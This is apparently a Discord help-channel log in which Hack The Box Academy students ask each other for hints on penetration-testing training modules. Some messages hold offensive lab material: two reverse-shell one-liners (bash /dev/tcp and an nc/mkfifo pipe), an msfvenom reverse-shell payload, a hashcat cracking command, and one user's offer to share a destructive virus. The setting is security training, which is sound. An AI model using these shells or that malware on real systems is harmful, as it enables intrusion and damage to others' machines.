Hi, could someone help me ? I'm stuck in FILE INCLUSION / DIRECTORY TRAVERSAL module, at the last question :/ I saw some hints on internet about php wrappers to retrieve index.php but i can't figure out

Hi,
Can I Unblock Teir III and TierIV If I Have Student Subscription?

Hi, I'm stuck exactly at the same question. Did anyone finish the OSINT module and can help me with the questions on GPS coordinates...?

Hi, Im working on the linux part of the file transfers module, anyone here able to answer a question?

Find a way to start a simple HTTP server using "npm". Submit the command that starts the web server on port 8080 (use the short argument to specify the port number).

Haven't been able to solve this since 10hours

Hey, can someone give me a hint on SQLMAP Essentials Skills Assessment?

Look it up.

I didn't find any useful info at the forum too

Got it ... a clue to my past me ||use --tamper=||

hy guys, i need some help for module buffer overflow based on stack... there is a question where you have to insert the theoricaly size of NOPs+shellcode_size, and the question tell me to write it with Format 00...what is this format?

Im in the same boat... found a way to get a shell on target, just sitting here banging my head against the wall. Tried the different steps outlined in the cred hunting sections

@sly nebula ran winpeas while I was doing the manual enumeration, still nothing...

In the module Windows Fundamentals - Skills Assessment do I need to start creating a shared folder ?

Or I can jump straigth to the question ?

So for the linux fundamentals course, the question where kernel version is installed on the system I think it needs to be updated but because theres a new version that is installed and its taking the old version as the correct answer and not the new one

bruh yesterday i lost my one and only Parrot OS spawn while doing the introduction module

now i need to get premium for more spawns?

anyone else having connection issues for the box on intro to sqli

You should use a vm, its better in so many ways

Hey all, sorry for the noob question but I just started the Linux fundamentals section in HTB Academy, under the User Management module there are the two questions Which option needs to be set to lock a user account using the "usermod" command? (long version of the option) and Which option needs to be set to execute a command as a different user using the "su" command? (long version of the option)…….Ive entered in —lock and every variation of usermod and it keeps kicking back as invalid answer. Likewise with the su question and —command. Any pointers? Been stuck on these for two days now. Thanks!

Someone have the answer??

Hi, there is even a whole thread on that question in the HTB forum, did you see that one?

Hi, there are two buffer overflow modules, and which section to you mean?

The modules about Linux buffer overflow

*module

And I have try to search in the forum, but there isn't the answer I need

If we're talking about the same question then you just need to insert an integer number + Bytes, like "100 Bytes" or something

Where?

try again... you're very very close, or maybe there was a technical problem.

Seriously, if I have lost two because I hadn't use "Bytes" word, I kill myself

😂

I feel you 😆

Anyway, thanks for the help

Hey good question. Its beneficial to learn both. Start with the one that you are more interested in and/or you see a more immediate benefit for. Overall both are great skills to have but it depends what your work entails on a day to day basis. If you work in an environment where you mainly work with Windows systems then Powershell will have a more immediate benefit to you. If you work mainly with Linux distributions then Bash will have a more immediate benefit. Does that make sense?

With this one you will need to follow each of the steps in the assessment to properly answer the questions .

Qn from academy ) Submit the full path kf the "xxd" binary.

Hey this qn is really weird. I mean they haven't taught about the extension but still askin

☹️

yeah that makes sense, thanks

What does -c 'ii' mean and what was the function of it?

Feel free to DM me for a nudge if you find time to work on it again today and if you havent already figured it out.

View the output without the "grep"-filter, and it should be easier to interpret. (If the question is about the grep filter itself – that means "view only lines with ii in them".)

per day hmmmmmmmmmmmm

Yes but you can also buy a small number of cubes and have unlimited spawns. Its good to experiment with Pwnbox and your own personal VM from time to time to see what you prefer. Pwnbox works quite well for me most of the time.

you can always use your own VM

pwnbox is good for getting started and used to things, but in the long run you'll want your own VM you can configure your own way and have tools you like installed and ready to go

so i just download a VM and install Parrot OS on it

right?

If your base OS is Windows you can use Virtualbox or VMware Workstation player to build & run the VM.

Hashcat > Working with Rules
What I missed...

||└──╼ $cat rule.txt
$2 $0 $2 $0
┌─[user59968@htb-asn2efvwzz]─[~]
└──╼ $cat hash
46244749d1e8fb99c37ad4f14fccb601ed4ae283
┌─[user59968@htb-asn2efvwzz]─[~]
└──╼ $hashcat -a 0 -m 100 hash /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -r rule.txt||

"npm local server http" google this

if you didnt find that in 10 hours 😳

Actually I got the answer
The answer was pretty simple 😂😂

That's it😂😂

yeah that's litterally in the npm docs

I asked this yesterday but didn’t get an answer. This is piggybacking off at @solar idol question. I have a kali Linux vm but I’m not able to remote into the target machine without a username/password. Would having a parrot os make a difference in removing in? I understand the free tier is one spawn per day but there’s no option to pause the session if I need to step away. I guess I’m still stuck on how people are using their own vms if the credentials to ssh aren’t provided

i think the default username and password of Kali is "kali" itself

if that answers your question

That’s not what I meant. I meant How can I use my kali vm to remote into the target machine without ssh creds

oh... im sorry but i aint capable enough to answer that. Im a complete NOOB.

Lmao no worries bro

i get this message when i use gobuster, can some please help what I need to do?

Apologies as this is just how I am reading it and a little confused on what you're actually asking 😅😅 ... most modules in which you have to connect to a machine within htb to complete will provide you with a vpn key file for you to use to connect using open vpn

If you're saying that it is asking you to connect to a machine yet have no credentials, potentially look through the modules of which you may have connected to another machine via ssh and use those creds to see if they work

You can use netcat or LinEnum.sh script to break into the priv esc. .

Did you try the wildcard switch it mentions?

haha... i was stuck forever on the nmap module and just realised my vpn crashed a while ago

problem solved!

@sly nebula you free for a nudge on WinPrivEsc Assessment 1?

hi i have a problem in sql injection module at skill assessment with kali

can dm someone so i dont spoil the answer

Right now I am doing the web requests module but whenever I use burps integrated browser it is infinitely loading

What happens when you click forward in Burp?

Feel free to DM me.

Hello everyone! As I see, academy has CPE for now. But how I can get from "Fundamental" modules if I already did this modules? And how I can use this CPE?

If you are meant to ssh into the remote machine you would be given credentials - or a way to obtin them

this is results

Try to use the same rule as in section but change on 2020 instead of 2019

Thank you!

No problem 🙂

Who can give me some tips? I'm in sqlmap skills assessment section. I found two endpoints which can be potential for injections but I don't understand with which parameters I can do it. I was trying to found calls of this endpoints in someplace of target but unsuccessfully..(

One of this endpoints return me SQL error and another return me permission denied for <someuser>

that was harsh - i'll fix it @urban sky

bot got a bit angry because you pinged too many people and aren't verified

Haha no worries. In case anyone brings this up again, I wasn’t using sudo for the vpn key I downloaded. Thanks again guys

Hey where is the Academy VPN file located?
Can I use the one provided in "Getting Started - Service Scanning" for all of the Academy?

When u processing section u can found VPN at bottom of page if questions and tasks of section need it

VPN files are usually situated within the modules when connecting to a machine is a requirement to complete a task

I dont want to use the pwnbox, so I got use a VPN from my Kali VM

Pwnbox Is basically a preconfigured parrot box of which can be used in browser, without a subscription you get 2 hours a day or something like that, subs allow for complete access all the time

I am a student sub so that doesnt matter. Also I do not want to use pwnbox, as they prohibit me from skipping/rereading a certain section of a module without the need of resizing

Ah I see what you mean now, apologies, misunderstood what you were saying 😅😅

No worries.
The main issue is that the information and links on the section "Connecting Using VPN" are just outdated ...

yo does anyone know what to do once connected to a pwbox on starting points?

nmap the target machine

I can VPN to HTB, starting point and other.
I just cant get the academy to work

The hackthebox.eu and academy.hackthebox.eu platforms are separate from each other, you need a vpn config file from the actual academy module to properly connect

I think it potentially works slightly different due to them being separate is what i was trying to say there, wasn't very clear 😅

Yeah. I got that.
I am on the "Getting Started module" and got the from Section: Service Scanning

bruh

why did they do that to my name lmfao

@languid fjord can u help me rq?

Can you access any tier 3 or 4 modules with a student subscription?

In web requests module in the post section, where do I get the flag?

Also tp get admin, we know the credentials already, so why do we need to do the sql injection thing

is gobuster reliable? I ask this because I created a wordlist.txt file with 3 entries:

api
prod
api-prod

I ran a gobuster dns using the wordlist.txt file and it picks up nothing when it should show api-prod
but it dose not

any ideas anyone?

I'm going through the Nibbles walkthrough and I'm missing how exactly they got the password. They run the config.xml file but they tried it because it was mentioned twice in the file? And the actual password wasn't capitalized. Just trying to find what exactly pointed to that being the password.

This module was a blast by the way. getting root is freaking exciting

It's an environmental variable. look there!

Just check your network interface. Mtu is not present inside any of "socket checker"

Can anyone help me with SQL injection fundamentals module in Union clause content, In the cube question they asked to connect to IP:Port but they didn't mentioned any password or any such thing. I tried with default username and password like 'root' and 'p@ssw0rd', but these are also not working.

Is it a login page?

Nope I tried to access IP:Port in browser but not accessible. I tried to connect using 'mysql' as well. But credentials are not provided as well.

Hey all, im stuck on the final part of the login brute forcing module. I have been creating wordlists using the correct tools, but none of them are working. Anyone I can dm for a hint?

I have sent you a dm

I am somewhat stuck on one section.
I am doing "Getting Started - Public Exploits".
I discovered the service furthermore I did a http-enum scan, but now I am stuck finding an attackable Plugin, a hint is appreciated. 🙂

banging my head against the wall for skill assessment Intro to Assembly Task 1. I created the loop to traverse the stack and xor its value with the key. Then I compile and run in gdb dumping the register value right after the xor operation (but before moving to the next value—e.g., adding 8 bytes). I then copy the hex values in a text file, concatenate them, clean them. I run the resulting shellcode in pwntools but nothing happens. I tried to reverse the bytes order to account for endianess, but same results. Anyone who could help?

windows buffer overflow module - when i click restart in debugger
rdp closes
my internet is fine
any help pls

Guys its okay to google how an exploit work how to configure it or watch a video related to do that . .this kind of act is considered as cheating while doing htb academy ctfs? Please reply.

<div class='center'><p>You don't have access to read the flag!</p></div>
<html>
<!DOCTYPE html>

<head>
<title>HTB Academy</title>
<style>
*,
html {
margin: 0;
padding: 0;
border: 0;
}

html {
  width: 100%;
  height: 100%;
}

body {
  width: 100%;
  height: 100%;
  position: relative;
  background-color: darkslategrey;
}

.center {
  width: 100%;
  height: 50%;
  margin: 0;
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  color: white;
  font-family: "Helvetica", Helvetica, sans-serif;
  text-align: center;
}

h1 {
  font-size: 144px;
}

p {
  font-size: 64px;
}

</style>
</head>

<body>
</body>

</html>

where flag

curl http://admin.academy.htb:31806/admin/admin.php -X POST -d '73=key' -H 'Content-Type: application/x-www-form-urlencoded'

From Value Fuzzing section

after using ids.txt i found 1 id with a different response size between 1000ids. I assume it has to be 73, but i cant read the flag. Can somebody please help me

curl http://admin.academy.htb:31806/admin/admin.php -X POST -d '73=key' -H 'Content-Type: application/x-www-form-urlencoded' this is ok but link should be the last one 🙂

try curl -d "73=key" -X POST http://admin...... without Content type?

You are close 🙂

Lol whoever made the fuzzing module had some speeeeedy wifi. They getting like 9700+ req per second and im getting between 30 and 150 🤣

Same situation. Sometimes i have 2 or 4. It depends of the situation 😄 Have you ended this module?

Nah just started it

ahh. i looking for someone who can explain me:
"Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains? (Write the extensions as '.ext', in alphabetical order separated by spaces ".ext1 .ext2 .ext3")"

What extension should i try to find??? i have added to /etc/hosts academy.htb

SO academy.FUZZ ?????

I haven't gotten there yet

I did figure out though that you can just increase the threads on your fuzzing command and you will get a lot more req/sec

i working from virtual machine... is available option in ffuf to increase threads? what is the switch??

-t [number]

I did -t 200

ahhhh i see it

I'm trying to go through NTFS vs. Share Permissions in Windows Fundamentals module but I'm stuck a the very beginning, I can't connect to the target with smbclient -L IPaddressOfTarget -U htb-student, I ran this from PWNBOX after RDP, did I understand correctly?

The Windows firewall may be blocking you

Thanks, I'll re-read that part!

Feel free to dm if you get stuck.

I could go on, but I don't understand ||how can I understand to which "Windows Defender Firewall Profiles" htb-student belongs to. I eventually set "Allow" for all of them and succeeded in connecting, but I'm not satisfied since I didn't understand why that happened||

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-firewall/best-practices-configuring I'm reading this but still failing to get the association between user and level :s
From academy: Once the proper inbound firewall rules are enabled we will successfully connect to the share. so basically I didn't understand how to determine the proper inbound, but I don't know if discussing this exceed the topic of this channel

So with the Defender firewall in Windows theres 3 different profiles: Private, Public and Domain. Each specific firewall profile applies based on which IP network the Windows computer is on. Its not necessarily related to the user account. Take for example Pwnbox, Pwnbox isnt on the same IP network so Windows defender doesnt initially trust SMB connections coming from Pwnbox. Its a good practice to experiment with the firewall in case an application isnt properly connecting. Completely disabling the firewall and leaving it disabled is a bad practice but can be a good troubleshooting step to see if thats whats blocking your connection. If you determine that the firewall is blocking your connection then you’ll have to consider which protocols and/or IP addresses the firewall is blocking. In this case there are some predefined firewall rules you can enable in the advanced firewall settings to allow SMB connections through without leaving the firewall completely disabled. Does that make sense?

Also keep in mind with any application or service that communicates over the network there will be certain protocols & ports in use. Its beneficial to learn which protocols an application uses to understand whats happening behind the scenes as you connect over networks. Even video games use ports. Anytime your studying an application or troubleshooting consider researching something like: “what protocols does ______ application use?” Or “How to allow ______ application network connections through a firewall.”. These things can help in Academy challenges and beyond. Also keep asking questions here in the Discord 🙂

i cannot understand this part

it says to go to this website but it never loads

pinging is fine though

i removed the port and i went to a tayside dogs website

is this the correct one ?

@warped shard What kind of error are you getting from loading the site itself?

so i recommend you go back to the extension fuzzing section, but if you still cant find it: ||just look for them all lol ||

Thanks for the detailed explanation 🙏🏻

I'm working on 'Linux Local Privilege Escalation - Skills Assessment' and only the fifth flag is left.
I became tomcat with reverse shell and I checked sudo -l and I saw one command with NO PASSWORD.
I searched the command on GTFOBins and ran but it wasn't working.
Any advice for me?

@deft terrace are you using dumb shell?

I didn't know what is dumb shell. I googled it and I think I'm using dumb shell.
I used this command 'msfvenom -p java/jsp_shell_reverse_tcp' to become tomcat.
Should I change my dumb shell to interactive shell? or there is a way to make interactive reverse shell??

are you using netcat to get the connection

Yes, I am. I got help from daylan. So I will try again tonight 🙂

oh do u have a interactive shell now

Not now. I will try to change it later 🙂

ik u can make it more interactive with netcat if you press Control Z then use the command "stty raw -echo" then press f then g

Thank you. I will try it when I got home 🙂

Many thanks guys for helping me

The Skills Assessment - File Inclusion/Directory Traversal has me at a standstill

Hello
I'm new, sorry if the question is dumb.
I try to connect with SSH to a HTB academy server like so: ssh htb-student@xx.xxx.xx.xx but after 2 minutes I get this error:
ssh: connect to host xx.xxx.xx.xx port 22: Connection timed out
Am I doing something wrong?

Make sure your vpn is up

try to ping the ip address

Are you using pwnbox or kali/parrot?

PING xx.xxx.x.xxx (xx.xxx.x.xxx) 56(84) bytes of data.

Nothing since 2 minutes

I use a shell on my own Linux

What do you mean?

Sorry my mistake, some of academy modules don't use a vpn

I had problem with that

please, contact customer support, that's the only way they were able to fix it for me

What does -tunleep4 do and the meaning of it??

is the content type not required since its a php post request?

Can I DM you?

yes

hi

Hlo

hello can someone support me with the skill assasment module of the "attacking web applications with ffuf module"

hola , que tal ;D

turns out i dont need support anymore, finished the module

sup

change me fucking nickname mods pls help

Verify yourself

++tryverify

To talk in other channels you need to verify yourself first:

1. Send ++verify in the #bot-commands channel
2. Follow the instruction you will receive in PM (i.e send ++identify <Account Identifier> directly to the bot
   (The instructions are available in the #welcome channel)

ighr

does someone completed the windows fundamentals module and can help me with the "skill assasment"

can i get help on web request?

It's a learning portal, so study all you like 🙂

in my case, i can't finish the box without google lol

google is your best friend 😄

I have a question about the "sql injection fundamentals" module.
The question is about finding a name AND when someone was hired out of the table and I've run the following command

select * from employees where first_name like 'bar%';

but i'm not seeing how to add an additional opperator to the search and i've been trying all sorts of silly things like piping the command again but with the other search criteria and various other things. any help would be appreciated

got it.... use AND after bar and do another where command

I guess this is the thing that can be frustrating about HTBA, I was just asked to use the AND operator to answer a question in the previous section and then look what the first thing was on the next page....

anyone doing HTB academy STACK-BASED BUFFER OVERFLOWS ON WINDOWS X86 ?
Final assessment : I am stuck with sooo many bad chars? Am I on right track I mean are there bad chars more that 10 or so ?

what's the question?

I need help in this question. I don't understand this question

Could please be a little more precise?
What have you done already?

This for the bash scipting module right? Use what you have learned to complete the task. The question is pretty straight forward.

Maybe elaborate on what you don't understand

darf der kevin bei mir spielen kommen?

s

s

s

s

s

s

s

s

s

s

s

ups...

Nein

hahaha

i dont understand how i can create a security group, i am just able to create a local group

can anyone tell me how to connect to this mysql server.

Remote file inclusion

I , Can someone help me with this section of the FLI module

How can i set on the allow_url_include ?

mysql -u root -h docker.hackthebox.eu -P 3306 -p , given that you are in the pwnbox or have a active openvpn session with the htb academy vpn key

Use the IP address from the taget

keeps saying user access denied, idk where i am going wrong?

tried with active vpn connection also

That👆

Or try with sudo i think that worked for me last night

ok

And i used the IP address not docker.hakthebox.eu

So it is the same strategy for the allow_url_fopen ?

Not sure, this is only my second module

It's the one I'm on as well

@stoic vessel you get in?

found my mistake

i was adding space after -P !!no space<port>

got in

👍 @merry bridge

Yay

Thx alot guys, I will try this. 👍

anyone can help with command injections module ?

What part are you stuck on? Anything before dnsadmin, i can help you with

anything after I can't

nobody?

I'd like help with File Inclusion, skill assessment

doing the web requests module i made a request to the server but i cant find apache server version what am i missing?

i got it after || curl -I -X server|| but why cant i see it in burp

@hollow flame try move your request to Repeater, send it and then check out what is in response output

if you navigate to the given ip , you will see a blog link in the top right corner click on it , you will be redirected to this website http://blog.inlanefreight.local/ you need to add it on you /etc/hosts/ and scan this link with wpsan and you will get what you need

yeah yeah i managed to solve it , Thank you

i am stuck at the last question " Obtain a shell on the system and submit the contents of the flag in the /home/erika directory." any idea how to solve it ?

hi

want my version of memz virus

ez just search online and dm me if you got issues

hey guys I just thought this would be cool to learn. what should i get started on

I started with Linux fundamentals

Hi, I have problems to RDP with the netadm user in the "Windows Privilege Escalation" Course in section Dns-admin. It always says "Username or Password not correct". I had the same issue also in the "Windows built-in groups" section. It's really strange, the password is same for all tasks, only the username is different, how can I be wrong here?! This is what I typed: rdesktop -u netadm -p "HTB_@cademy_stdnt!" 10.129.43.42

if you see any obvious mistake, please let me know...

reset also didn't help

@knotty hemlock can you ping the server?

yes, i even get the login-screen, it's just that the password seems wrong

username not found

or is there a problem with the domain maybe? 🤨 the password is the same for most of the tasks in the windows priv esc course...

@knotty hemlock just checked it, everything works fine
did you try to reset your target?

now i'm really confused! 🙂 yes, i tried again now with a fresh target, this one:

and this is my login screen which doesn't work (username or password incorrect) :

I also tried to remove the WINLPE-DC01 but it didn't work

this is how i called it (also tried xfreerdp, but it also didn't work): rdesktop -u "svc_backup" -p "HTB_@cademy_stdnt!" 10.129.43.42

...the underscores were stolen by the auto formatting, but in reality the're there..

Module 'Getting Started' Section 'Privilege Escalation' (or just in general)

How do I run a script (like LinPEAS) on a machine over a reverse shell?

^

Please help!

I'm also now having trouble setting up a reverse shell. I'm using Linux and the following two commands that I got from the academy do not work:

bash -c ‘bash -i >& /dev/TCP/00.000.00.000/<port> 0>&1’

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 00.000.00.000 <port> >/tmp/f

I am using the OpenVpn academy key and the correct ip and port generated.

Has anyone done the last assessment on the LFI module?

hi guys

Have someone a hint for Command Injections - Skills Assessment?

hi

Did you figure this out?

Hi guys nice to meet all of you, i am new here and cant type in general so ill just ask my question here. Can someone give me a brute force machine that is active and free to use on htb, i want something similar to nineveh (its retired now). Thank you!

ps: i fixed the reason i couldnt speak in general just saw my DMs

"What is the index number of the "sudoers" file in the "/etc" directory?" I've gone to the "/etc" directory and put the command "ls -i" for the index number for the sudoers file but it keeps saying the five-digit number is wrong I've restarted the VM and VPN number to no avail help would be great.#LINUX FUNDAMENTALS#Navigation

What do -f1 and -f2 mean and what's the function of it?

I need some help

In linux fundamentals quiz

https://www.explainshell.com/explain?cmd=cut+-d+"'"+-f2

Thank you!

hello

anyone know some kind of hacking

Hello,
I am doing the getting started module and on the knowledge check part.
I have gained access via /admin panel and have the correct details to login, however the websites takes minutes to load a page at a time?
Any advice would be great?

https://hackthebox.eu

can someone tell me what format the answer will be in?

web requests POST methods

i tried logging in with admin:password as the tutorial above said

it logs in

is that it?

i think theres more to it

but what is it?

nvm cookie manipulation was teh thing i had to do

Hi, I'm new to HTB. I'm trying to complete the skills assessment for the windows fundamental module and am stuck on one of the questions. It asks to "List the SID associated with the user account Jim" but when I list all the users there is no Jim user. Have I completely misunderstood the question? I used the command wmic useraccount get name,sid and Jim does not appear in the list

Follow the steps in the skills assessment. You will see that one of the steps is to create the user Jim.

Thanks Itnbob. How stupid of me.

It happens, no worries. Keep pushing forward and feel free to reach out for guidance anytime 🙂

thank you

pls be careful with spoilers

do i use spoiler?

your screenshot had some answers in it

why is this wrong?

what about now?

now its fine
which module and section?

linux fondamentals / system information

did you SSH into your target?

no im using the given instance

from the browser

owwww

i thought that was what they were talking about (the machine that spawned already)

thnx cry0l1t3

you're welcome

hey folks!
is discord nitro is required for creating a bot👉 👈 🙄

nope

"solved" it... seems like a bug in rdesktop. when I use xfreerdp, I can log in without problems. 😩 strange though, that it happens only with some of the accounts.

Can anyone please help me in SQL injection Fundamentals skill assessment, I am not able to bypass the Login form, I found one db.sql file and got credentials as well but they are not working.

Did you figure this out? I’m stuck here too

someone speak spanish

Anyone able to help with the last question of the Active Directory LDAP skill assessment ‘What non-default privilege does the HTB-student user have?’

@rustic sage me